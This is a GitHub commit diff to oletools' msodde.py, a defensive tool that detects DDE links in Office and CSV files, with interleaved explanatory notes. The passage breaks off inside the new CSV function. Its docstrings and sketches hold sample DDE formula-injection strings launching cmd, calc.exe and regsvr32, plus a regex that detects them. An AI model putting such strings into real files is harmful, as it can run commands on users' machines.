Commit 95ca88d297935a2de9175b92152713b64d3f6e6c
Committed by GitHub
Merge pull request #241 from christian-intra2net/dde-in-csv
Dde in csv
Showing 7 changed files with 472 additions and 187 deletions
oletools/msodde.py
@@ -9,6 +9,7 @@ Supported formats:
 - Word 97-2003 (.doc, .dot), Word 2007+ (.docx, .dotx, .docm, .dotm)
 - Excel 97-2003 (.xls), Excel 2007+ (.xlsx, .xlsm, .xlsb)
 - RTF
+- CSV (exported from / imported into Excel)
 
 Author: Philippe Lagadec - http://www.decalage.info
 License: BSD, see source code or documentation
@@ -17,39 +18,72 @@ msodde is part of the python-oletools package:
 http://www.decalage.info/python/oletools
 """
 
-# === LICENSE ==================================================================
+# === LICENSE =================================================================
 
 # msodde is copyright (c) 2017 Philippe Lagadec (http://www.decalage.info)
 # All rights reserved.
 #
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
 #
-#  * Redistributions of source code must retain the above copyright notice, this
-#    list of conditions and the following disclaimer.
+#  * Redistributions of source code must retain the above copyright notice,
+#    this list of conditions and the following disclaimer.
 #  * Redistributions in binary form must reproduce the above copyright notice,
 #    this list of conditions and the following disclaimer in the documentation
 #    and/or other materials provided with the distribution.
 #
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+# POSSIBILITY OF SUCH DAMAGE.
+
+# -- IMPORTS ------------------------------------------------------------------
 
 from __future__ import print_function
 
-#------------------------------------------------------------------------------
+import argparse
+import zipfile
+import os
+from os.path import abspath, dirname
+import sys
+import json
+import logging
+import re
+import csv
+
+# import lxml or ElementTree for XML parsing:
+try:
+    # lxml: best performance for XML processing
+    import lxml.etree as ET
+except ImportError:
+    import xml.etree.cElementTree as ET
+
+# little hack to allow absolute imports even if oletools is not installed
+# Copied from olevba.py
+PARENT_DIR = dirname(dirname(abspath(__file__)))
+if PARENT_DIR not in sys.path:
+    sys.path.insert(0, PARENT_DIR)
+del PARENT_DIR
+
+from oletools.thirdparty import olefile
+from oletools import ooxml
+from oletools import xls_parser
+from oletools import rtfobj
+
+# -----------------------------------------------------------------------------
 # CHANGELOG:
 # 2017-10-18 v0.52 PL: - first version
 # 2017-10-20       PL: - fixed issue #202 (handling empty xml tags)
 # 2017-10-23       ES: - add check for fldSimple codes
-# 2017-10-24       ES: - group tags and track begin/end tags to keep DDE strings together
+# 2017-10-24       ES: - group tags and track begin/end tags to keep DDE
+#                        strings together
 # 2017-10-25       CH: - add json output
 # 2017-10-25       CH: - parse doc
 #                  PL: - added logging
@@ -59,10 +93,11 @@ from __future__ import print_function
 # 2017-11-29       CH: - added support for xlsb files
 # 2017-11-29       PL: - added support for RTF files (issue #223)
 # 2017-12-07       CH: - ensure rtf file is closed
+# 2018-01-05       CH: - add CSV
 
-__version__ = '0.52dev9'
+__version__ = '0.52dev10'
 
-#------------------------------------------------------------------------------
+# -----------------------------------------------------------------------------
 # TODO: field codes can be in headers/footers/comments - parse these
 # TODO: generalize behaviour for xlsx: find all external links (maybe rename
 #       command line flag for "blacklist" to "find all suspicious" or so)
@@ -71,40 +106,10 @@ __version__ = '0.52dev9'
 #       DDE-Links
 # TODO: avoid reading complete rtf file data into memory
 
-#------------------------------------------------------------------------------
+# -----------------------------------------------------------------------------
 # REFERENCES:
 
 
-#--- IMPORTS ------------------------------------------------------------------
-
-import argparse
-import zipfile
-import os
-import sys
-import json
-import logging
-import re
-from struct import unpack
-
-# import lxml or ElementTree for XML parsing:
-try:
-    # lxml: best performance for XML processing
-    import lxml.etree as ET
-except ImportError:
-    import xml.etree.cElementTree as ET
-
-# little hack to allow absolute imports even if oletools is not installed
-# Copied from olevba.py
-_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
-_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
-if not _parent_dir in sys.path:
-    sys.path.insert(0, _parent_dir)
-
-from oletools.thirdparty import olefile
-from oletools import ooxml
-from oletools import xls_parser
-from oletools import rtfobj
-
 # === PYTHON 2+3 SUPPORT ======================================================
 
 if sys.version_info[0] >= 3:
@@ -123,7 +128,9 @@ TAG_W_P = "{%s}p" % NS_WORD
 TAG_W_R = "{%s}r" % NS_WORD
 ATTR_W_INSTR = '{%s}instr' % NS_WORD
 ATTR_W_FLDCHARTYPE = '{%s}fldCharType' % NS_WORD
-LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/header1.xml','word/footer1.xml','word/header2.xml','word/footer2.xml','word/comments.xml']
+LOCATIONS = ('word/document.xml', 'word/endnotes.xml', 'word/footnotes.xml',
+             'word/header1.xml', 'word/footer1.xml', 'word/header2.xml',
+             'word/footer2.xml', 'word/comments.xml')
 
 # list of acceptable, harmless field instructions for blacklist field mode
 # c.f. http://officeopenxml.com/WPfieldInstructions.php or the official
@@ -133,73 +140,74 @@ LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/
 #    switches_with_args, switches_without_args, format_switches)
 FIELD_BLACKLIST = (
     # date and time:
-    ('CREATEDATE', 0, 0, '', 'hs', 'datetime'),
-    ('DATE', 0, 0, '', 'hls', 'datetime'),
-    ('EDITTIME', 0, 0, '', '', 'numeric'),
-    ('PRINTDATE', 0, 0, '', 'hs', 'datetime'),
-    ('SAVEDATE', 0, 0, '', 'hs', 'datetime'),
-    ('TIME', 0, 0, '', '', 'datetime'),
+    ('CREATEDATE', 0, 0, '', 'hs', 'datetime'),    # pylint: disable=bad-whitespace
+    ('DATE', 0, 0, '', 'hls', 'datetime'),         # pylint: disable=bad-whitespace
+    ('EDITTIME', 0, 0, '', '', 'numeric'),         # pylint: disable=bad-whitespace
+    ('PRINTDATE', 0, 0, '', 'hs', 'datetime'),     # pylint: disable=bad-whitespace
+    ('SAVEDATE', 0, 0, '', 'hs', 'datetime'),      # pylint: disable=bad-whitespace
+    ('TIME', 0, 0, '', '', 'datetime'),            # pylint: disable=bad-whitespace
     # exclude document automation (we hate the "auto" in "automation")
     # (COMPARE, DOCVARIABLE, GOTOBUTTON, IF, MACROBUTTON, PRINT)
     # document information
-    ('AUTHOR', 0, 1, '', '', 'string'),
-    ('COMMENTS', 0, 1, '', '', 'string'),
-    ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'),
-    ('FILENAME', 0, 0, '', 'p', 'string'),
-    ('FILESIZE', 0, 0, '', 'km', 'numeric'),
-    ('KEYWORDS', 0, 1, '', '', 'string'),
-    ('LASTSAVEDBY', 0, 0, '', '', 'string'),
-    ('NUMCHARS', 0, 0, '', '', 'numeric'),
-    ('NUMPAGES', 0, 0, '', '', 'numeric'),
-    ('NUMWORDS', 0, 0, '', '', 'numeric'),
-    ('SUBJECT', 0, 1, '', '', 'string'),
-    ('TEMPLATE', 0, 0, '', 'p', 'string'),
-    ('TITLE', 0, 1, '', '', 'string'),
+    ('AUTHOR', 0, 1, '', '', 'string'),            # pylint: disable=bad-whitespace
+    ('COMMENTS', 0, 1, '', '', 'string'),          # pylint: disable=bad-whitespace
+    ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'),   # pylint: disable=bad-whitespace
+    ('FILENAME', 0, 0, '', 'p', 'string'),         # pylint: disable=bad-whitespace
+    ('FILESIZE', 0, 0, '', 'km', 'numeric'),       # pylint: disable=bad-whitespace
+    ('KEYWORDS', 0, 1, '', '', 'string'),          # pylint: disable=bad-whitespace
+    ('LASTSAVEDBY', 0, 0, '', '', 'string'),       # pylint: disable=bad-whitespace
+    ('NUMCHARS', 0, 0, '', '', 'numeric'),         # pylint: disable=bad-whitespace
+    ('NUMPAGES', 0, 0, '', '', 'numeric'),         # pylint: disable=bad-whitespace
+    ('NUMWORDS', 0, 0, '', '', 'numeric'),         # pylint: disable=bad-whitespace
+    ('SUBJECT', 0, 1, '', '', 'string'),           # pylint: disable=bad-whitespace
+    ('TEMPLATE', 0, 0, '', 'p', 'string'),         # pylint: disable=bad-whitespace
+    ('TITLE', 0, 1, '', '', 'string'),             # pylint: disable=bad-whitespace
     # equations and formulas
-    # exlude '=' formulae because they have different syntax
-    ('ADVANCE', 0, 0, 'dlruxy', '', ''),
-    ('SYMBOL', 1, 0, 'fs', 'ahju', ''),
+    # exlude '=' formulae because they have different syntax (and can be bad)
+    ('ADVANCE', 0, 0, 'dlruxy', '', ''),           # pylint: disable=bad-whitespace
+    ('SYMBOL', 1, 0, 'fs', 'ahju', ''),            # pylint: disable=bad-whitespace
     # form fields
-    ('FORMCHECKBOX', 0, 0, '', '', ''),
-    ('FORMDROPDOWN', 0, 0, '', '', ''),
-    ('FORMTEXT', 0, 0, '', '', ''),
+    ('FORMCHECKBOX', 0, 0, '', '', ''),            # pylint: disable=bad-whitespace
+    ('FORMDROPDOWN', 0, 0, '', '', ''),            # pylint: disable=bad-whitespace
+    ('FORMTEXT', 0, 0, '', '', ''),                # pylint: disable=bad-whitespace
     # index and tables
-    ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''),
+    ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''),     # pylint: disable=bad-whitespace
     # exlude RD since that imports data from other files
-    ('TA', 0, 0, 'clrs', 'bi', ''),
-    ('TC', 1, 0, 'fl', 'n', ''),
-    ('TOA', 0, 0, 'bcdegls', 'fhp', ''),
-    ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''),
-    ('XE', 1, 0, 'frty', 'bi', ''),
+    ('TA', 0, 0, 'clrs', 'bi', ''),                # pylint: disable=bad-whitespace
+    ('TC', 1, 0, 'fl', 'n', ''),                   # pylint: disable=bad-whitespace
+    ('TOA', 0, 0, 'bcdegls', 'fhp', ''),           # pylint: disable=bad-whitespace
+    ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''),     # pylint: disable=bad-whitespace
+    ('XE', 1, 0, 'frty', 'bi', ''),                # pylint: disable=bad-whitespace
     # links and references
     # exclude AUTOTEXT and AUTOTEXTLIST since we do not like stuff with 'AUTO'
-    ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''),
-    ('CITATION', 1, 0, 'lfspvm', 'nty', ''),
+    ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''),         # pylint: disable=bad-whitespace
+    ('CITATION', 1, 0, 'lfspvm', 'nty', ''),       # pylint: disable=bad-whitespace
     # exclude HYPERLINK since we are allergic to URLs
     # exclude INCLUDEPICTURE and INCLUDETEXT (other file or maybe even URL?)
     # exclude LINK and REF (could reference other files)
-    ('NOTEREF', 1, 0, '', 'fhp', ''),
-    ('PAGEREF', 1, 0, '', 'hp', ''),
-    ('QUOTE', 1, 0, '', '', 'datetime'),
-    ('STYLEREF', 1, 0, '', 'lnprtw', ''),
+    ('NOTEREF', 1, 0, '', 'fhp', ''),              # pylint: disable=bad-whitespace
+    ('PAGEREF', 1, 0, '', 'hp', ''),               # pylint: disable=bad-whitespace
+    ('QUOTE', 1, 0, '', '', 'datetime'),           # pylint: disable=bad-whitespace
+    ('STYLEREF', 1, 0, '', 'lnprtw', ''),          # pylint: disable=bad-whitespace
     # exclude all Mail Merge commands since they import data from other files
     # (ADDRESSBLOCK, ASK, COMPARE, DATABASE, FILLIN, GREETINGLINE, IF,
     # MERGEFIELD, MERGEREC, MERGESEQ, NEXT, NEXTIF, SET, SKIPIF)
     # Numbering
-    ('LISTNUM', 0, 1, 'ls', '', ''),
-    ('PAGE', 0, 0, '', '', 'numeric'),
-    ('REVNUM', 0, 0, '', '', ''),
-    ('SECTION', 0, 0, '', '', 'numeric'),
-    ('SECTIONPAGES', 0, 0, '', '', 'numeric'),
-    ('SEQ', 1, 1, 'rs', 'chn', 'numeric'),
-    # user information
-    ('USERADDRESS', 0, 1, '', '', 'string'),
-    ('USERINITIALS', 0, 1, '', '', 'string'),
-    ('USERNAME', 0, 1, '', '', 'string'),
+    ('LISTNUM', 0, 1, 'ls', '', ''),               # pylint: disable=bad-whitespace
+    ('PAGE', 0, 0, '', '', 'numeric'),             # pylint: disable=bad-whitespace
+    ('REVNUM', 0, 0, '', '', ''),                  # pylint: disable=bad-whitespace
+    ('SECTION', 0, 0, '', '', 'numeric'),          # pylint: disable=bad-whitespace
+    ('SECTIONPAGES', 0, 0, '', '', 'numeric'),     # pylint: disable=bad-whitespace
+    ('SEQ', 1, 1, 'rs', 'chn', 'numeric'),         # pylint: disable=bad-whitespace
+    # user information                             # pylint: disable=bad-whitespace
+    ('USERADDRESS', 0, 1, '', '', 'string'),       # pylint: disable=bad-whitespace
+    ('USERINITIALS', 0, 1, '', '', 'string'),      # pylint: disable=bad-whitespace
+    ('USERNAME', 0, 1, '', '', 'string'),          # pylint: disable=bad-whitespace
 )
 
 FIELD_DDE_REGEX = re.compile(r'^\s*dde(auto)?\s+', re.I)
 
+# filter modes
 FIELD_FILTER_DDE = 'only dde'
 FIELD_FILTER_BLACKLIST = 'exclude blacklisted'
 FIELD_FILTER_ALL = 'keep all'
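Note on the new "filter modes" constants: FIELD_FILTER_DDE keeps only fields
whose instruction matches FIELD_DDE_REGEX above. A minimal, self-contained
sketch of that regex at work (the sample field strings are invented for
illustration, not taken from this commit):

    import re

    FIELD_DDE_REGEX = re.compile(r'^\s*dde(auto)?\s+', re.I)

    samples = (u'DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"',
               u'dde excel.exe sheet.xlsx',
               u'PAGE')
    for field in samples:
        # only the first two count as dde links; matching is case-insensitive
        print('{0!r}: {1}'.format(field, bool(FIELD_DDE_REGEX.match(field))))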
@@ -229,6 +237,7 @@ LOG_LEVELS = {
     'critical': logging.CRITICAL
 }
 
+
 class NullHandler(logging.Handler):
     """
     Log Handler without output, to avoid printing messages if logging is not
@@ -239,6 +248,7 @@ class NullHandler(logging.Handler):
     def emit(self, record):
         pass
 
+
 def get_logger(name, level=logging.CRITICAL+1):
     """
     Create a suitable logger object for this module.
@@ -251,7 +261,7 @@ def get_logger(name, level=logging.CRITICAL+1):
     # First, test if there is already a logger with the same name, else it
     # will generate duplicate messages (due to duplicate handlers):
     if name in logging.Logger.manager.loggerDict:
-        #NOTE: another less intrusive but more "hackish" solution would be to
+        # NOTE: another less intrusive but more "hackish" solution would be to
         # use getLogger then test if its effective level is not default.
         logger = logging.getLogger(name)
         # make sure level is OK:
@@ -292,8 +302,8 @@ def ensure_stdout_handles_unicode():
     # try to find encoding for sys.stdout
     encoding = None
     try:
-        encoding = sys.stdout.encoding   # variable encoding might not exist
-    except Exception:
+        encoding = sys.stdout.encoding
+    except AttributeError:   # variable "encoding" might not exist
         pass
 
     if encoding not in (None, '', 'ascii'):
@@ -316,7 +326,8 @@ def ensure_stdout_handles_unicode():
     sys.stdout = wrapper(sys.stdout)
 
 
-ensure_stdout_handles_unicode()   # e.g. for print(text) in main()
+if sys.version_info.major < 3:
+    ensure_stdout_handles_unicode()   # e.g. for print(text) in main()
 
 
 # === ARGUMENT PARSING =======================================================
@@ -338,28 +349,34 @@ def existing_file(filename):
 
 def process_args(cmd_line_args=None):
     """ parse command line arguments (given ones or per default sys.argv) """
-    parser = ArgParserWithBanner(description='A python tool to detect and extract DDE links in MS Office files')
+    parser = ArgParserWithBanner(description='A python tool to detect and '
+                                 'extract DDE links in MS Office files')
     parser.add_argument("filepath", help="path of the file to be analyzed",
                         type=existing_file, metavar='FILE')
     parser.add_argument('-j', "--json", action='store_true',
                         help="Output in json format. Do not use with -ldebug")
-    parser.add_argument("--nounquote", help="don't unquote values",action='store_true')
-    parser.add_argument('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL,
-                        help="logging level debug/info/warning/error/critical (default=%(default)s)")
+    parser.add_argument("--nounquote", help="don't unquote values",
+                        action='store_true')
+    parser.add_argument('-l', '--loglevel', dest="loglevel", action="store",
+                        default=DEFAULT_LOG_LEVEL,
+                        help="logging level debug/info/warning/error/critical "
+                             "(default=%(default)s)")
     filter_group = parser.add_argument_group(
-            title='Filter which OpenXML field commands are returned',
-            description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE '
-                        '(e.g. .doc). These options are mutually exclusive, last '
-                        'option found on command line overwrites earlier ones.')
+        title='Filter which OpenXML field commands are returned',
+        description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE '
+                    '(e.g. .doc). These options are mutually exclusive, last '
+                    'option found on command line overwrites earlier ones.')
     filter_group.add_argument('-d', '--dde-only', action='store_const',
                               dest='field_filter_mode', const=FIELD_FILTER_DDE,
                               help='Return only DDE and DDEAUTO fields')
     filter_group.add_argument('-f', '--filter', action='store_const',
-                              dest='field_filter_mode', const=FIELD_FILTER_BLACKLIST,
-                              help='Return all fields except harmless ones like PAGE')
+                              dest='field_filter_mode',
+                              const=FIELD_FILTER_BLACKLIST,
+                              help='Return all fields except harmless ones')
     filter_group.add_argument('-a', '--all-fields', action='store_const',
                               dest='field_filter_mode', const=FIELD_FILTER_ALL,
-                              help='Return all fields, irrespective of their contents')
+                              help='Return all fields, irrespective of their '
+                                   'contents')
     parser.set_defaults(field_filter_mode=FIELD_FILTER_DEFAULT)
 
     return parser.parse_args(cmd_line_args)
@@ -368,16 +385,19 @@ def process_args(cmd_line_args=None):
 # === FUNCTIONS ==============================================================
 
 # from [MS-DOC], section 2.8.25 (PlcFld):
-# A field consists of two parts: field instructions and, optionally, a result. All fields MUST begin with
-# Unicode character 0x0013 with sprmCFSpec applied with a value of 1. This is the field begin
-# character. All fields MUST end with a Unicode character 0x0015 with sprmCFSpec applied with a value
-# of 1. This is the field end character. If the field has a result, then there MUST be a Unicode character
-# 0x0014 with sprmCFSpec applied with a value of 1 somewhere between the field begin character and
-# the field end character. This is the field separator. The field result is the content between the field
-# separator and the field end character. The field instructions are the content between the field begin
-# character and the field separator, if one is present, or between the field begin character and the field
-# end character if no separator is present. The field begin character, field end character, and field
-# separator are collectively referred to as field characters.
+# A field consists of two parts: field instructions and, optionally, a result.
+# All fields MUST begin with Unicode character 0x0013 with sprmCFSpec applied
+# with a value of 1. This is the field begin character. All fields MUST end
+# with a Unicode character 0x0015 with sprmCFSpec applied with a value of 1.
+# This is the field end character. If the field has a result, then there MUST
+# be a Unicode character 0x0014 with sprmCFSpec applied with a value of 1
+# somewhere between the field begin character and the field end character. This
+# is the field separator. The field result is the content between the field
+# separator and the field end character. The field instructions are the content
+# between the field begin character and the field separator, if one is present,
+# or between the field begin character and the field end character if no
+# separator is present. The field begin character, field end character, and
+# field separator are collectively referred to as field characters.
 
 
 def process_doc_field(data):
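To make the quoted [MS-DOC] passage concrete, here is a small hand-made
illustration of the field-character layout (the character stream below is
invented, not taken from this commit):

    stream = u'before\x13DDEAUTO cmd "/k calc.exe"\x14result\x15after'

    begin = stream.index(u'\x13')        # field begin character
    end = stream.index(u'\x15', begin)   # field end character
    field = stream[begin + 1:end]
    # instructions end at the field separator (0x14), if one is present:
    instructions = field.split(u'\x14', 1)[0]
    print(instructions)                  # -> DDEAUTO cmd "/k calc.exe"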
@@ -387,7 +407,6 @@ def process_doc_field(data):
     log.debug('processing field \'{0}\''.format(data))
 
     if data.lstrip().lower().startswith(u'dde'):
-        #log.debug('--> is DDE!')
         return data
     elif data.lstrip().lower().startswith(u'\x00d\x00d\x00e\x00'):
         return data
@@ -512,7 +531,6 @@ def process_doc(filepath):
     return u'\n'.join(links)
 
 
-
 def process_xls(filepath):
     """ find dde links in excel ole file """
 
@@ -531,17 +549,15 @@ def process_xls(filepath):
 
 
 def process_docx(filepath, field_filter_mode=None):
+    """ find dde-links (and other fields) in Word 2007+ files """
     log.debug('process_docx')
     all_fields = []
-    with zipfile.ZipFile(filepath) as z:
-        for filepath in z.namelist():
+    with zipfile.ZipFile(filepath) as zipper:
+        for filepath in zipper.namelist():
             if filepath in LOCATIONS:
-                data = z.read(filepath)
+                data = zipper.read(filepath)
                 fields = process_xml(data)
                 if len(fields) > 0:
-                    #print ('DDE Links in %s:'%filepath)
-                    #for f in fields:
-                    #    print(f)
                     all_fields.extend(fields)
 
     # apply field command filter
@@ -560,8 +576,10 @@ def process_docx(filepath, field_filter_mode=None):
                          .format(field_filter_mode))
 
     return u'\n'.join(clean_fields)
-
+
+
 def process_xml(data):
+    """ Find dde-links and other fields in office XML data """
     # parse the XML data:
     root = ET.fromstring(data)
     fields = []
@@ -569,39 +587,41 @@ def process_xml(data):
     level = 0
     # find all the tags 'w:p':
     # parse each for begin and end tags, to group DDE strings
-    # fldChar can be in either a w:r element, floating alone in the w:p or spread accross w:p tags
+    # fldChar can be in either a w:r element, floating alone in the w:p
+    # or spread accross w:p tags
     # escape DDE if quoted etc
     # (each is a chunk of a DDE link)
 
     for subs in root.iter(TAG_W_P):
         elem = None
-        for e in subs:
-            #check if w:r and if it is parse children elements to pull out the first FLDCHAR or INSTRTEXT
-            if e.tag == TAG_W_R:
-                for child in e:
-                    if child.tag == TAG_W_FLDCHAR or child.tag == TAG_W_INSTRTEXT:
+        for curr_elem in subs:
+            # check if w:r; parse children to pull out first FLDCHAR/INSTRTEXT
+            if curr_elem.tag == TAG_W_R:
+                for child in curr_elem:
+                    if child.tag == TAG_W_FLDCHAR or \
+                            child.tag == TAG_W_INSTRTEXT:
                         elem = child
                         break
             else:
-                elem = e
-            #this should be an error condition
+                elem = curr_elem
+            # this should be an error condition
             if elem is None:
                 continue
-
-            #check if FLDCHARTYPE and whether "begin" or "end" tag
+
+            # check if FLDCHARTYPE and whether "begin" or "end" tag
             if elem.attrib.get(ATTR_W_FLDCHARTYPE) is not None:
                 if elem.attrib[ATTR_W_FLDCHARTYPE] == "begin":
-                    level += 1
+                    level += 1
                 if elem.attrib[ATTR_W_FLDCHARTYPE] == "end":
                     level -= 1
-                    if level == 0 or level == -1 :  # edge-case where level becomes -1
+                    if level == 0 or level == -1:   # edge-case; level becomes -1
                         fields.append(ddetext)
                         ddetext = u''
-                        level = 0  # reset edge-case
-
+                        level = 0   # reset edge-case
+
         # concatenate the text of the field, if present:
         if elem.tag == TAG_W_INSTRTEXT and elem.text is not None:
-            #expand field code if QUOTED
+            # expand field code if QUOTED
             ddetext += unquote(elem.text)
 
     for elem in root.iter(TAG_W_FLDSIMPLE):
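A hedged usage sketch for the begin/end grouping above: feeding process_xml a
hand-written fragment of word/document.xml (the XML snippet is invented and
assumes the module-level defaults, e.g. unquoting left enabled):

    from oletools import msodde

    DATA = b'''<w:document
      xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
     <w:body><w:p>
      <w:r><w:fldChar w:fldCharType="begin"/></w:r>
      <w:r><w:instrText>DDEAUTO cmd "/k calc.exe"</w:instrText></w:r>
      <w:r><w:fldChar w:fldCharType="end"/></w:r>
     </w:p></w:body></w:document>'''

    # expected: [u'DDEAUTO cmd "/k calc.exe"']
    print(msodde.process_xml(DATA))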
@@ -611,25 +631,28 @@ def process_xml(data):
 
     return fields
 
-def unquote(field):
+
+def unquote(field):
     if "QUOTE" not in field or NO_QUOTES:
         return field
-    #split into components
+    # split into components
     parts = field.strip().split(" ")
     ddestr = ""
-    for p in parts[1:]:
-        try:
-            ch = chr(int(p))
+    for part in parts[1:]:
+        try:
+            character = chr(int(part))
         except ValueError:
-            ch = p
-        ddestr += ch
+            character = part
+        ddestr += character
     return ddestr
 
+
 # "static variables" for field_is_blacklisted:
 FIELD_WORD_REGEX = re.compile(r'"[^"]*"|\S+')
 FIELD_BLACKLIST_CMDS = tuple(field[0].lower() for field in FIELD_BLACKLIST)
 FIELD_SWITCH_REGEX = re.compile(r'^\\[\w#*@]$')
 
+
 def field_is_blacklisted(contents):
     """ Check if given field contents matches any in FIELD_BLACKLIST
 
@@ -651,7 +674,7 @@ def field_is_blacklisted(contents):
         index = FIELD_BLACKLIST_CMDS.index(words[0].lower())
     except ValueError:   # first word is no blacklisted command
         return False
-    log.debug('trying to match "{0}" to blacklist command {0}'
+    log.debug('trying to match "{0}" to blacklist command {1}'
               .format(contents, FIELD_BLACKLIST[index]))
     _, nargs_required, nargs_optional, sw_with_arg, sw_solo, sw_format \
         = FIELD_BLACKLIST[index]
@@ -706,14 +729,15 @@ def field_is_blacklisted(contents):
             if 'numeric' in sw_format:
                 arg_choices = []   # too many choices to list them here
             else:
-                log.debug('unexpected switch {0} in "{1}"'.format(switch, contents))
+                log.debug('unexpected switch {0} in "{1}"'
+                          .format(switch, contents))
                 return False
 
     # if nothing went wrong sofar, the contents seems to match the blacklist
     return True
 
 
-def process_xlsx(filepath, filed_filter_mode=None):
+def process_xlsx(filepath):
     """ process an OOXML excel file (e.g. .xlsx or .xlsb or .xlsm) """
     dde_links = []
     parser = ooxml.XmlParser(filepath)
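Two quick calls against the blacklist check above; the expected results follow
from FIELD_BLACKLIST and are consistent with the examples in
tests/msodde/test_blacklist.py:

    from oletools import msodde

    # harmless command with one optional argument -> blacklisted (filtered out)
    print(msodde.field_is_blacklisted(u'AUTHOR "Tony Caruso"'))       # True
    # dde commands are not in the blacklist -> kept for the report
    print(msodde.field_is_blacklisted(u'DDEAUTO cmd "/k calc.exe"'))  # False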
@@ -733,7 +757,8 @@ def process_xlsx(filepath, filed_filter_mode=None):
         try:
             logging.info('Parsing non-xml subfile {0} with content type {1}'
                          .format(subfile, content_type))
-            for record in xls_parser.parse_xlsb_part(handle, content_type, subfile):
+            for record in xls_parser.parse_xlsb_part(handle, content_type,
+                                                     subfile):
                 logging.debug('{0}: {1}'.format(subfile, record))
                 if isinstance(record, xls_parser.XlsbBeginSupBook) and \
                         record.link_type == \
@@ -791,8 +816,9 @@ class RtfFieldParser(rtfobj.RtfParser):
 
 RTF_START = b'\x7b\x5c\x72\x74'   # == b'{\rt' but does not mess up auto-indent
 
+
 def process_rtf(file_handle, field_filter_mode=None):
-    log.debug('process_rtf')
+    """ find dde links or other fields in rtf file """
     all_fields = []
     data = RTF_START + file_handle.read()   # read complete file into memory!
     file_handle.close()
@@ -818,35 +844,119 @@ def process_rtf(file_handle, field_filter_mode=None):
     return u'\n'.join(clean_fields)
 
 
+# threshold when to consider a csv file "small"; also used as sniffing size
+CSV_SMALL_THRESH = 1024
+
+# format of dde link: program-name | arguments ! unimportant
+CSV_DDE_FORMAT = re.compile(r'\s*=(.+)\|(.+)!(.*)\s*')
+
+# allowed delimiters (python sniffer would use nearly any char). Taken from
+# https://data-gov.tw.rpi.edu/wiki/CSV_files_use_delimiters_other_than_commas
+CSV_DELIMITERS = ',\t ;|^'
+
+
+def process_csv(filepath):
+    """ find dde in csv text
+
+    finds text parts like =cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'! or
+    =MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 [...]
+
+    Hoping here that the :py:class:`csv.Sniffer` determines quote and delimiter
+    chars the same way that excel does. Tested to some extend in unittests.
+
+    This can only find DDE-links, no other "suspicious" constructs (yet).
+    """
+
+    results = []
+    with open(filepath, 'r') as file_handle:
+        results, dialect = process_csv_dialect(file_handle, CSV_DELIMITERS)
+        is_small = file_handle.tell() < CSV_SMALL_THRESH
+
+        if is_small and not results:
+            # easy to mis-sniff small files. Try different delimiters
+            log.debug('small file, no results; try all delimiters')
+            file_handle.seek(0)
+            other_delim = CSV_DELIMITERS.replace(dialect.delimiter, '')
+            for delim in other_delim:
+                try:
+                    file_handle.seek(0)
+                    results, _ = process_csv_dialect(file_handle, delim)
+                except csv.Error:   # e.g. sniffing fails
+                    log.debug('failed to csv-parse with delimiter {0!r}'
+                              .format(delim))
+
+        if is_small and not results:
+            # try whole file as single cell, since sniffing fails in this case
+            log.debug('last attempt: take whole file as single unquoted cell')
+            file_handle.seek(0)
+            match = CSV_DDE_FORMAT.match(file_handle.read(CSV_SMALL_THRESH))
+            if match:
